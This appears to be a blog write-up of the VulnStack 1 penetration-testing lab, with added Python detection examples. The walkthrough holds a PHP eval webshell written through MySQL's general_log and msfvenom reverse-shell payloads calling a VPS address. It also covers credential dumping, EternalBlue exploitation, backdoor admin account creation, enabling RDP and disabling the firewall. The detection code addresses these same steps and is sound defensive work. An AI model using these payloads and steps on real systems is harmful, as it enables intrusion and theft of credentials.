VulnStack 1


Finally got around to doing the VulnStack lab :(

Plenty of people have already written this one up, so this is just a quick walkthrough of the basic steps.

Environment setup

Three machines:

Win7, internet-facing host: 192.168.239.128, internal IP 192.168.52.143, password hongrisec@2019
Windows 2003: 192.168.52.141, password HONGRISEC@2019, domain controller
Windows 2008: 192.168.52.138, password HONGRISEC@2019

The internet-facing host serves a website via phpStudy, reachable from the public side at 192.168.64.128

External network

What we find is a PHP probe page, so let's test MySQL from it:

Username and password are both root, and the connection works.

Gather information with dirsearch:

phpMyAdmin is exposed, so let's look at how phpMyAdmin can be abused.

show variables like '%secure_file%';

Check whether we have the file-write permission:

The value here is NULL, so a shell can't be written directly.

Writing a shell via the log:

With general_log enabled, MySQL writes every query executed from then on into the file at the location you specify:

set global general_log = "ON";
set global general_log_file = "C:/phpStudy/WWW/1.php"

I extracted phpStudy straight to the C: drive, so the path is C:/WWW/1.php

Then run select "<?php eval($_POST['cmd']);?>"
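Detection side, as an added example that is not part of the original post: the technique above (switch on general_log, point general_log_file at a file under the web root, then smuggle PHP into a query) leaves two kinds of evidence, the server variables themselves and the statements in the query or audit trail. The Python below audits a SHOW VARIABLES snapshot and scans query lines for exactly those statements. WEB_ROOTS, the sample variable snapshot and the sample query lines are assumptions constructed for this lab's phpStudy layout.

```python
import re

# Directories the PHP server executes scripts from; assumed values for this lab's phpStudy layout.
WEB_ROOTS = ["C:/phpStudy/WWW", "C:/WWW"]
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp")


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison: forward slashes, no trailing slash, lower case."""
    return path.replace("\\", "/").rstrip("/").lower()


def under_web_root(path: str) -> bool:
    """True if path lies inside one of WEB_ROOTS (either slash style, case-insensitive)."""
    p = _norm(path)
    return any(p == r or p.startswith(r + "/") for r in map(_norm, WEB_ROOTS))


def audit_variables(variables: dict) -> list:
    """Flag a SHOW VARIABLES snapshot that permits the log-to-webshell route.
    `variables` maps name -> value; a NULL from SHOW VARIABLES is passed as None."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp is None or str(sfp).upper() == "NULL":
        pass  # NULL disables LOAD DATA / SELECT ... INTO OUTFILE entirely
    elif sfp == "":
        findings.append("secure_file_priv is empty: SELECT ... INTO OUTFILE may write anywhere")
    elif under_web_root(sfp):
        findings.append(f"secure_file_priv points into the web root: {sfp}")
    log_file = variables.get("general_log_file") or ""
    log_on = str(variables.get("general_log", "OFF")).upper() == "ON"
    if log_file and (under_web_root(log_file) or _norm(log_file).endswith(SCRIPT_EXTS)):
        sev = "CRITICAL" if log_on else "WARNING"
        findings.append(f"{sev}: general_log_file is a web-served path: {log_file}")
    return findings


_SET_LOG_FILE = re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"]?([^'\";]+)", re.I)
_SET_LOG_ON = re.compile(r"set\s+global\s+general_log\s*=\s*['\"]?(on|1)", re.I)
_PHP_TAG = re.compile(r"<\?php|<\?=", re.I)


def scan_query_log(lines) -> list:
    """Return (line_number, reason) for each statement that matches the technique."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _SET_LOG_FILE.search(line)
        if m and (under_web_root(m.group(1)) or _norm(m.group(1)).endswith(SCRIPT_EXTS)):
            hits.append((n, f"general_log redirected to web-served path {m.group(1).strip()}"))
        elif _SET_LOG_ON.search(line):
            hits.append((n, "general_log switched on at runtime"))
        elif _PHP_TAG.search(line):
            hits.append((n, "PHP code embedded in a query (webshell payload)"))
    return hits


# Constructed sample: the statements this post uses, as they would appear in a query/audit trail.
SAMPLE_QUERIES = [
    "show variables like '%secure_file%';",
    'set global general_log = "ON";',
    'set global general_log_file = "C:/phpStudy/WWW/1.php"',
    "select \"<?php eval($_POST['cmd']);?>\"",
]

if __name__ == "__main__":
    # Constructed snapshot of the variables after the post's two SET GLOBAL statements.
    snapshot = {"secure_file_priv": None, "general_log": "ON",
                "general_log_file": "C:/phpStudy/WWW/1.php"}
    for finding in audit_variables(snapshot):
        print("[var]", finding)
    for n, why in scan_query_log(SAMPLE_QUERIES):
        print(f"[query {n}] {why}")
```

A general_log_file under a web root or ending in a script extension is the thing to alert on. secure_file_priv being NULL, as the post finds, only blocks INTO OUTFILE; it does nothing to stop the log route, so the two settings have to be checked independently.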

Browse to 1.php

My first attempt failed, so I wrote to 2.php instead

Connect with AntSword (蚁剑):

Shell obtained. There's no yxcms route here, so I'm leaving that path out for now.

Getting a Cobalt Strike beacon

Bring the host online in Cobalt Strike:

Start a teamserver on a VPS and connect the CS client to it:

./teamserver ip 123456

On Windows, use cobaltstrike.bat and generate a PowerShell payload:

That's all it takes to generate it.

Fill in your own VPS address, then run it in PowerShell:

The shell comes back:

Right-click, choose Interact, set sleep 0, then run commands:

Privilege escalation: this needs another listener; I opened port 6001 for it.

Right-click the shell and pick the privilege-escalation option; we get a shell with SYSTEM privileges:

dumphash and logonpasswords then give us the Win7 password:

Lateral movement

net view

Identify the domain controller:

net group "domain controllers" /domain

List the domain accounts:

net group "domain users" /domain

List the domain admins:

net group "domain admins" /domain

Hit the domain controller with psexec:

Straight through.

Actually I should also have changed the Win7 password to HONGRISEC@2019 so the passwords match, since Administrator is a domain admin.

Online in CS:

The MSF approach comes later; taking a break first (

The MSF approach

Build a shell with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=2333 -f exe -o shell.exe

MSF listener:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 2333
lport => 2333
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:2333

Then upload it with AntSword and run it:

The shell comes back:

The MSF session can be passed to CS:

Passing the MSF session to CS

Use the listener on port 2333, then in meterpreter:

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost vps_ip
set lport 2333
set session 1
run

Note that lhost must be the real IP here, not 0.0.0.0, and the payload must be reverse_http,

otherwise the session never comes back.

From here the process is the same as with CS: net view to enumerate the internal network, then follow the steps above.

I won't repeat that; continuing with MSF:

net view

Unlike CS, this doesn't directly show the internal IPs.

The results are pretty confusing.

Escalate privileges first:

MSF can do getsystem directly: exit back to meterpreter and run getsystem.

Back in the shell, we're already SYSTEM.

Dump the credentials:

load kiwi
creds_all

That doesn't work:

Probably because the 32-bit kiwi is running on a 64-bit machine.

No problem, generate an x64 Windows shell and try again:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=106.52.94.23 lport=2333 -f exe -o shell2.exe

After restarting the listener it works.

A quick extra note on meterpreter migration:

Meterpreter migration

This moves meterpreter into a stable process so the running shell isn't suddenly killed.

Use ps to list processes,

then getpid to get meterpreter's own PID:

Next, find a stable process, e.g. explorer.exe

Enter

migrate 3348

The session just died, so here's a screenshot of a successful run.

Successfully migrated into explorer.exe.

Lateral movement

Run ipconfig in AntSword to find the subnets:

Found the 52 subnet.

Upload fscan and scan:

fscan64.exe -h 192.168.52.1-255

The results are written to result.txt in the working directory:

192.168.52.138:445 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.141:445 open
192.168.52.138:135 open
192.168.52.143:445 open
192.168.52.141:139 open
192.168.52.141:135 open
192.168.52.143:139 open
192.168.52.143:135 open
192.168.52.138:80 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.141:7002 open
192.168.52.141:8098 open
192.168.52.141:8099 open
[*] NetInfo:
[*]192.168.52.143
[->]stu1
[->]192.168.52.143
[->]192.168.239.128
[->]169.254.129.186
[+] 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
[*] NetBios: 192.168.52.143 stu1.god.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle: http://192.168.52.138 code:200 len:689 title:IIS7
[+] 192.168.52.141 MS17-010 (Windows Server 2003 3790)
[*] NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409 title:The page must be viewed over a secure channel
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632 title:Sentinel Keys License Monitor
[*] NetBios: 192.168.52.138 [+]DC owa.god.org Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle: http://192.168.52.143 code:200 len:14731 title:phpStudy 探针 2014
[+] ftp://192.168.52.141:21:anonymous

Filter out .143, which is this host itself.

The other hosts found are 192.168.52.141 and 192.168.52.138.
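The result.txt above is useful beyond picking targets: the same output is what a defender would use to inventory the subnet and rank remediation. As an added example (not from the original post or from the fscan project), the Python below parses the lines into per-host records and ranks hosts by the findings fscan reports (MS17-010, DC role, anonymous FTP, SMB exposed). The sample embedded in it is a trimmed copy of the output above; the scoring weights are assumptions.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Host:
    ip: str
    ports: set = field(default_factory=set)
    names: list = field(default_factory=list)   # NetInfo aliases ([->] lines) other than the IP itself
    fqdn: str = ""
    os: str = ""
    is_dc: bool = False
    ms17_010: bool = False
    web: list = field(default_factory=list)     # (url, http code, title)
    anon_ftp: bool = False


_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
_PORT = re.compile(rf"^{_IP}:(\d+) open$")
_NETINFO_IP = re.compile(rf"^\[\*\]{_IP}$")
_ALIAS = re.compile(r"^\[->\](.+)$")
_MS17 = re.compile(rf"^\[\+\] {_IP} MS17-010 \((.+)\)$")
_NETBIOS = re.compile(rf"^\[\*\] NetBios: {_IP} (\[\+\]DC )?(\S+) (.+)$")
_WEB = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:\d+ title:(.*)$")
_ANON_FTP = re.compile(rf"^\[\+\] ftp://{_IP}:(\d+):anonymous$")
_URL_HOST = re.compile(rf"^https?://{_IP}")


def parse_fscan(text: str) -> dict:
    """Parse fscan's result.txt into {ip: Host}."""
    hosts: dict = {}
    current = None  # host whose [->] alias lines follow a [*]<ip> header
    for line in (raw.strip() for raw in text.splitlines()):
        if m := _NETINFO_IP.match(line):
            current = hosts.setdefault(m[1], Host(m[1]))
            continue
        if (m := _ALIAS.match(line)) and current is not None:
            if m[1] != current.ip:
                current.names.append(m[1])
            continue
        current = None  # any other line ends the NetInfo block
        if m := _PORT.match(line):
            hosts.setdefault(m[1], Host(m[1])).ports.add(int(m[2]))
        elif m := _MS17.match(line):
            h = hosts.setdefault(m[1], Host(m[1]))
            h.ms17_010, h.os = True, h.os or m[2]
        elif m := _NETBIOS.match(line):
            h = hosts.setdefault(m[1], Host(m[1]))
            h.is_dc, h.fqdn, h.os = bool(m[2]), m[3], m[4]
        elif (m := _WEB.match(line)) and (u := _URL_HOST.match(m[1])):
            hosts.setdefault(u[1], Host(u[1])).web.append((m[1], int(m[2]), m[3]))
        elif m := _ANON_FTP.match(line):
            h = hosts.setdefault(m[1], Host(m[1]))
            h.anon_ftp = True
            h.ports.add(int(m[2]))
    return hosts


def triage(hosts: dict, self_ip: str) -> list:
    """Rank every host except self_ip by remediation urgency: (ip, score, name). Weights are assumptions."""
    def score(h: Host) -> int:
        s = 0
        if h.ms17_010:
            s += 100  # unpatched SMB, wormable
        if h.is_dc:
            s += 50   # domain controller, largest blast radius
        if h.anon_ftp:
            s += 10
        if 445 in h.ports:
            s += 5
        return s
    ranked = sorted((h for ip, h in hosts.items() if ip != self_ip), key=lambda h: (-score(h), h.ip))
    return [(h.ip, score(h), h.fqdn or ",".join(h.names)) for h in ranked]


# Constructed sample: a trimmed copy of the result.txt shown in this post.
FSCAN_OUTPUT = """\
192.168.52.138:445 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.141:445 open
192.168.52.143:445 open
192.168.52.141:21 open
[*] NetInfo:
[*]192.168.52.143
[->]stu1
[->]192.168.52.143
[->]192.168.239.128
[->]169.254.129.186
[+] 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
[*] NetBios: 192.168.52.143 stu1.god.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle: http://192.168.52.138 code:200 len:689 title:IIS7
[+] 192.168.52.141 MS17-010 (Windows Server 2003 3790)
[*] NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
[*] NetBios: 192.168.52.138 [+]DC owa.god.org Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[+] ftp://192.168.52.141:21:anonymous
"""

if __name__ == "__main__":
    for ip, score, name in triage(parse_fscan(FSCAN_OUTPUT), "192.168.52.143"):
        print(f"{ip:16} score={score:<4} {name}")
```

The ranking puts the domain controller first even though both internal hosts are flagged for MS17-010; the NetBios line with the [+]DC marker is what carries that information, so it is worth parsing rather than just grepping for "MS17-010".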

Add a route to the 52 subnet:

run autoroute -s 192.168.52.0/24
run autoroute -p #show the routing table

Port status:

192.168.52.138:445 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.138:135 open
192.168.52.138:80 open

192.168.52.141:7001 open
192.168.52.141:445 open
192.168.52.141:139 open
192.168.52.141:135 open
192.168.52.141:21 open
192.168.52.141:7002 open
192.168.52.141:8098 open
192.168.52.141:8099 open

Both have 445 open, so hit them with EternalBlue.

First enable 3389 on the internet-facing host. The second line below is the same command with the backslashes and quotes escaped, which is the form needed when it is passed through msf's set command later on.

#enable 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

#disable 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

Or run it from meterpreter:

run post/windows/manage/enable_rdp

Add an administrator account:

net user err0r hongrisec@2019 /add
net localgroup administrators err0r /add
net user err0r

Connect via Remote Desktop:

err0r
hongrisec@2019

or

GOD\Administrator
HONGRISEC@2019

and we're in.

Next, use EternalBlue on the remaining hosts

Administrator

Done.

141:

background
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 106.52.94.23
lhost => 106.52.94.23
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 6001
lport => 6001
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 106.52.94.23:6001:- -
[*] Started reverse TCP handler on 0.0.0.0:6001
[*] 192.168.52.141:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.52.141:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] 192.168.52.141:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.52.141:445 - The target is vulnerable.
[-] 192.168.52.141:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

The exploit fails: the 64-bit module can't be used on this target.

Try a different approach:

use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.52.141
set rport 445
run

It returns nt authority\system, so we have SYSTEM. Commands have to be entered one at a time here.

Enable 3389

set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

fscan shows 3389 is now open; connect from the internet-facing host as before:

Done.

The same procedure takes the .138 machine:

The firewall has to be turned off here too:

set command netsh advfirewall set allprofiles state off

With the firewall off, 3389 is reachable.
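Every host-side change made in this post (enabling Remote Desktop through fDenyTSConnections, creating a local account and adding it to Administrators, and switching the firewall off) is a process creation with a distinctive command line, which is what a defender would watch for. As an added example, not from the original post, the Python below applies simple rules to such command lines and correlates them per host into one alert. The timestamps, host names and event list are constructed to mirror the post's commands; a real feed would be the CommandLine field of Sysmon event 1 or Security event 4688. Note that fDenyTSConnections is a boolean: 0 enables RDP and any non-zero value (the post's 11111111 included) disables it, which is why the rules key on the value rather than on how the key path is quoted.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule is (tag, regex); a named group "user" captures the account name where one applies.
RULES = [
    # fDenyTSConnections: 0 enables Remote Desktop, any non-zero value disables it.
    ("rdp_enabled",  re.compile(r"fDenyTSConnections\b.*?/d\s+0+(?=\s|$)", re.I)),
    ("rdp_disabled", re.compile(r"fDenyTSConnections\b.*?/d\s+0*[1-9]\d*", re.I)),
    ("user_added",   re.compile(r"^\s*net1?\s+user\s+(?P<user>\S+)\s+\S+\s+/add\b", re.I)),
    ("admin_added",  re.compile(r"^\s*net1?\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I)),
    ("fw_disabled",  re.compile(r"^\s*netsh\s+advfirewall\s+set\s+\S+\s+state\s+off\b", re.I)),
]


def classify(cmdline: str) -> list:
    """Return [(tag, user_or_None)] for every rule the command line matches."""
    out = []
    for tag, rx in RULES:
        m = rx.search(cmdline)
        if m:
            out.append((tag, m.groupdict().get("user")))
    return out


def detect(events, window=timedelta(minutes=30)):
    """events: iterable of (datetime, host, cmdline).
    Returns (hits, alerts). hits has one entry per matched rule. alerts fires when, on one
    host within `window`, an account is created, added to Administrators, and RDP is
    enabled or the firewall disabled: the pattern this post's RDP access step follows."""
    hits, by_host = [], defaultdict(list)
    for ts, host, cmd in events:
        for tag, user in classify(cmd):
            hits.append((ts, host, tag, user))
            by_host[host].append((ts, tag, user))
    alerts = []
    for host, seq in by_host.items():
        for ts, tag, user in seq:
            if tag != "admin_added":
                continue
            near = [(g, u) for t2, g, u in seq if abs(t2 - ts) <= window]
            created = ("user_added", user) in near
            exposure = {g for g, _ in near} & {"rdp_enabled", "fw_disabled"}
            if created and exposure:
                alerts.append((host, user, sorted(exposure)))
    return hits, alerts


# Constructed sample events mirroring the commands used in this post (timestamps and host names assumed).
T0 = datetime(2021, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    (T0, "stu1", 'REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'),
    (T0 + timedelta(minutes=1), "stu1", "net user err0r hongrisec@2019 /add"),
    (T0 + timedelta(minutes=1, seconds=10), "stu1", "net localgroup administrators err0r /add"),
    (T0 + timedelta(minutes=2), "stu1", "net user err0r"),
    (T0 + timedelta(minutes=15), "owa", "netsh advfirewall set allprofiles state off"),
    (T0 + timedelta(hours=1), "stu1", 'REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f'),
]

if __name__ == "__main__":
    hits, alerts = detect(SAMPLE_EVENTS)
    for ts, host, tag, user in hits:
        print(f"{ts:%H:%M:%S} {host:5} {tag:13} {user or ''}")
    for host, user, exposure in alerts:
        print(f"ALERT {host}: new admin {user!r} created while {', '.join(exposure)}")
```

The firewall change on the second host matches on its own but produces no correlated alert, because no account was created there; in practice that single hit still deserves a ticket, the correlation only decides what gets escalated first.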

All hosts taken.